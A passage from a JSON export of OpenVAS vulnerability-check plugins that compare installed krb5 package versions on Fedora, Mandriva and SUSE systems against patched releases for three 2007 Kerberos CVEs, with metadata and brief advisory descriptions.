isrpmvuln(pkg:\"x86_64/krb5-workstation\", rpm:\"x86_64/krb5-workstation~1.5~21\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/krb5-devel\", rpm:\"x86_64/krb5-devel~1.5~21\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/krb5-libs\", rpm:\"x86_64/krb5-libs~1.5~21\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/krb5-workstation\", rpm:\"i386/krb5-workstation~1.5~21\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/debug/krb5-debuginfo\", rpm:\"i386/debug/krb5-debuginfo~1.5~21\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/krb5-libs\", rpm:\"i386/krb5-libs~1.5~21\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/krb5-server\", rpm:\"i386/krb5-server~1.5~21\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/krb5-devel\", rpm:\"i386/krb5-devel~1.5~21\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:41:48", "description": "Check for the Version of krb5", "cvss3": {}, "published": "2009-04-09T00:00:00", "type": "openvas", "title": "Mandriva Update for krb5 MDKSA-2007:077-1 (krb5)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957", "CVE-2007-0956", "CVE-2007-1216"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310830144", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310830144", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for krb5 MDKSA-2007:077-1 (krb5)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability was found in the username handling of the MIT krb5\n telnet daemon. A remote attacker that could access the telnet port\n of a target machine could login as root without requiring a password\n (CVE-2007-0956).\n\n Buffer overflows in the kadmin server daemon were discovered that could\n be exploited by a remote attacker able to access the KDC. Successful\n exploitation could allow for the execution of arbitrary code with\n the privileges of the KDC or kadmin server processes (CVE-2007-0957).\n \n Finally, a double-free flaw was discovered in the GSSAPI library used\n by the kadmin server daemon, which could lead to a denial of service\n condition or the execution of arbitrary code with the privileges of\n the KDC or kadmin server processes (CVE-2007-1216).\n \n Updated packages have been patched to address this issue.\n \n Update:\n \n Packages for Mandriva Linux 2007.1 are now available.\";\n\ntag_affected = \"krb5 on Mandriva Linux 2007.1,\n Mandriva Linux 2007.1/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2007-04/msg00010.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.830144\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 13:53:01 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"MDKSA\", value: \"2007:077-1\");\n script_cve_id(\"CVE-2007-0956\", \"CVE-2007-0957\", \"CVE-2007-1216\");\n script_name( \"Mandriva Update for krb5 MDKSA-2007:077-1 (krb5)\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of krb5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"ftp-client-krb5\", rpm:\"ftp-client-krb5~1.5.2~6.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ftp-server-krb5\", rpm:\"ftp-server-krb5~1.5.2~6.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-server\", rpm:\"krb5-server~1.5.2~6.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-workstation\", rpm:\"krb5-workstation~1.5.2~6.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkrb53\", rpm:\"libkrb53~1.5.2~6.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkrb53-devel\", rpm:\"libkrb53-devel~1.5.2~6.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"telnet-client-krb5\", rpm:\"telnet-client-krb5~1.5.2~6.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"telnet-server-krb5\", rpm:\"telnet-server-krb5~1.5.2~6.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5\", rpm:\"krb5~1.5.2~6.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64krb53\", rpm:\"lib64krb53~1.5.2~6.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64krb53-devel\", rpm:\"lib64krb53-devel~1.5.2~6.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:41:03", "description": "Check for the Version of krb5", "cvss3": {}, "published": "2009-04-09T00:00:00", "type": "openvas", "title": "Mandriva Update for krb5 MDKSA-2007:077 (krb5)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957", "CVE-2007-0956", "CVE-2007-1216"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310830220", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310830220", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for krb5 MDKSA-2007:077 (krb5)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability was found in the username handling of the MIT krb5\n telnet daemon. A remote attacker that could access the telnet port\n of a target machine could login as root without requiring a password\n (CVE-2007-0956).\n\n Buffer overflows in the kadmin server daemon were discovered that could\n be exploited by a remote attacker able to access the KDC. Successful\n exploitation could allow for the execution of arbitrary code with the\n privileges of the KDC or kadmin server processes (CVE-2007-0957).\n \n Finally, a double-free flaw was discovered in the GSSAPI library used\n by the kadmin server daemon, which could lead to a denial of service\n condition or the execution of arbitrary code with the privileges of\n the KDC or kadmin server processes (CVE-2007-1216).\n \n Updated packages have been patched to address this issue.\";\n\ntag_affected = \"krb5 on Mandriva Linux 2006.0,\n Mandriva Linux 2006.0/X86_64,\n Mandriva Linux 2007.0,\n Mandriva Linux 2007.0/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2007-04/msg00005.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.830220\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 13:53:01 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"MDKSA\", value: \"2007:077\");\n script_cve_id(\"CVE-2007-0956\", \"CVE-2007-0957\", \"CVE-2007-1216\");\n script_name( \"Mandriva Update for krb5 MDKSA-2007:077 (krb5)\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of krb5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"ftp-client-krb5\", rpm:\"ftp-client-krb5~1.4.3~6.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ftp-server-krb5\", rpm:\"ftp-server-krb5~1.4.3~6.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-server\", rpm:\"krb5-server~1.4.3~6.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-workstation\", rpm:\"krb5-workstation~1.4.3~6.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkrb53\", rpm:\"libkrb53~1.4.3~6.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkrb53-devel\", rpm:\"libkrb53-devel~1.4.3~6.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"telnet-client-krb5\", rpm:\"telnet-client-krb5~1.4.3~6.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"telnet-server-krb5\", rpm:\"telnet-server-krb5~1.4.3~6.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5\", rpm:\"krb5~1.4.3~6.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64krb53\", rpm:\"lib64krb53~1.4.3~6.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64krb53-devel\", rpm:\"lib64krb53-devel~1.4.3~6.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2006.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"ftp-client-krb5\", rpm:\"ftp-client-krb5~1.4.2~2.2.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ftp-server-krb5\", rpm:\"ftp-server-krb5~1.4.2~2.2.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-server\", rpm:\"krb5-server~1.4.2~2.2.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-workstation\", rpm:\"krb5-workstation~1.4.2~2.2.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkrb53\", rpm:\"libkrb53~1.4.2~2.2.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkrb53-devel\", rpm:\"libkrb53-devel~1.4.2~2.2.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"telnet-client-krb5\", rpm:\"telnet-client-krb5~1.4.2~2.2.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"telnet-server-krb5\", rpm:\"telnet-server-krb5~1.4.2~2.2.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5\", rpm:\"krb5~1.4.2~2.2.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64krb53\", rpm:\"lib64krb53~1.4.2~2.2.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64krb53-devel\", rpm:\"lib64krb53-devel~1.4.2~2.2.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-12T11:20:53", "description": "Check for the Version of krb5", "cvss3": {}, "published": "2009-01-28T00:00:00", "type": "openvas", "title": "SuSE Update for krb5 SUSE-SA:2007:025", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957", "CVE-2007-0956", "CVE-2007-1216"], "modified": "2017-12-08T00:00:00", "id": "OPENVAS:850083", "href": "http://plugins.openvas.org/nasl.php?oid=850083", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2007_025.nasl 8050 2017-12-08 09:34:29Z santu $\n#\n# SuSE Update for krb5 SUSE-SA:2007:025\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The krb5 telnet daemon allowed remote attackers to skip\n authentication and gain root access CVE-2007-0956\n\n A bug in the function krb5_klog_syslog() leads to a buffer overflow\n which could be exploited to execute arbitrary code CVE-2007-0957.\n\n A double-free bug in the GSS-API library could crash kadmind. It's\n potentially also exploitable to execute arbitrary code\n CVE-2007-1216.\";\n\ntag_impact = \"remote code execution\";\ntag_affected = \"krb5 on SUSE LINUX 10.1, openSUSE 10.2, SUSE SLED 10, SUSE SLES 10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_id(850083);\n script_version(\"$Revision: 8050 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-08 10:34:29 +0100 (Fri, 08 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-28 13:40:10 +0100 (Wed, 28 Jan 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUSE-SA\", value: \"2007-025\");\n script_cve_id(\"CVE-2007-0956\", \"CVE-2007-0957\", \"CVE-2007-1216\");\n script_name( \"SuSE Update for krb5 SUSE-SA:2007:025\");\n\n script_summary(\"Check for the Version of krb5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"SLED10\")\n{\n\n if ((res = isrpmvuln(pkg:\"krb5\", rpm:\"krb5~1.4.3~19.10.3\", rls:\"SLED10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-32bit\", rpm:\"krb5-32bit~1.4.3~19.10.3\", rls:\"SLED10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-devel\", rpm:\"krb5-devel~1.4.3~19.10.3\", rls:\"SLED10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-devel-32bit\", rpm:\"krb5-devel-32bit~1.4.3~19.10.3\", rls:\"SLED10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-server\", rpm:\"krb5-server~1.4.3~19.10.3\", rls:\"SLED10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE10.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"krb5\", rpm:\"krb5~1.5.1~23.4\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-apps-servers\", rpm:\"krb5-apps-servers~1.5.1~23.4\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-devel\", rpm:\"krb5-devel~1.5.1~23.4\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-server\", rpm:\"krb5-server~1.5.1~23.4\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-32bit\", rpm:\"krb5-32bit~1.5.1~23.4\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-devel-32bit\", rpm:\"krb5-devel-32bit~1.5.1~23.4\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"SLES10\")\n{\n\n if ((res = isrpmvuln(pkg:\"krb5\", rpm:\"krb5~1.4.3~19.10.3\", rls:\"SLES10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-32bit\", rpm:\"krb5-32bit~1.4.3~19.10.3\", rls:\"SLES10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-devel\", rpm:\"krb5-devel~1.4.3~19.10.3\", rls:\"SLES10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-devel-32bit\", rpm:\"krb5-devel-32bit~1.4.3~19.10.3\", rls:\"SLES10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-server\", rpm:\"krb5-server~1.4.3~19.10.3\", rls:\"SLES10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-apps-servers\", rpm:\"krb5-apps-servers~1.4.3~19.10.3\", rls:\"SLES10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"SL10.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"krb5\", rpm:\"krb5~1.4.3~19.10.3\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-apps-servers\", rpm:\"krb5-apps-servers~1.4.3~19.10.3\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-devel\", rpm:\"krb5-devel~1.4.3~19.10.3\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-server\", rpm:\"krb5-server~1.4.3~19.10.3\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:59", "description": "Check for the Version of krb5", "cvss3": {}, "published": "2009-04-09T00:00:00", "type": "openvas", "title": "Mandriva Update for krb5 MDKSA-2007:077 (krb5)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957", "CVE-2007-0956", "CVE-2007-1216"], "modified": "2017-07-06T00:00:00", "id": "OPENVAS:830220", "href": "http://plugins.openvas.org/nasl.php?oid=830220", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for krb5 MDKSA-2007:077 (krb5)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability was found in the username handling of the MIT krb5\n telnet daemon. A remote attacker that could access the telnet port\n of a target machine could login as root without requiring a password\n (CVE-2007-0956).\n\n Buffer overflows in the kadmin server daemon were discovered that could\n be exploited by a remote attacker able to access the KDC. Successful\n exploitation could allow for the execution of arbitrary code with the\n privileges of the KDC or kadmin server processes (CVE-2007-0957).\n \n Finally, a double-free flaw was discovered in the GSSAPI library used\n by the kadmin server daemon, which could lead to a denial of service\n condition or the execution of arbitrary code with the privileges of\n the KDC or kadmin server processes (CVE-2007-1216).\n \n Updated packages have been patched to address this issue.\";\n\ntag_affected = \"krb5 on Mandriva Linux 2006.0,\n Mandriva Linux 2006.0/X86_64,\n Mandriva Linux 2007.0,\n Mandriva Linux 2007.0/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2007-04/msg00005.php\");\n script_id(830220);\n script_version(\"$Revision: 6568 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:04:21 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 13:53:01 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"MDKSA\", value: \"2007:077\");\n script_cve_id(\"CVE-2007-0956\", \"CVE-2007-0957\", \"CVE-2007-1216\");\n script_name( \"Mandriva Update for krb5 MDKSA-2007:077 (krb5)\");\n\n script_summary(\"Check for the Version of krb5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"ftp-client-krb5\", rpm:\"ftp-client-krb5~1.4.3~6.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ftp-server-krb5\", rpm:\"ftp-server-krb5~1.4.3~6.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-server\", rpm:\"krb5-server~1.4.3~6.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-workstation\", 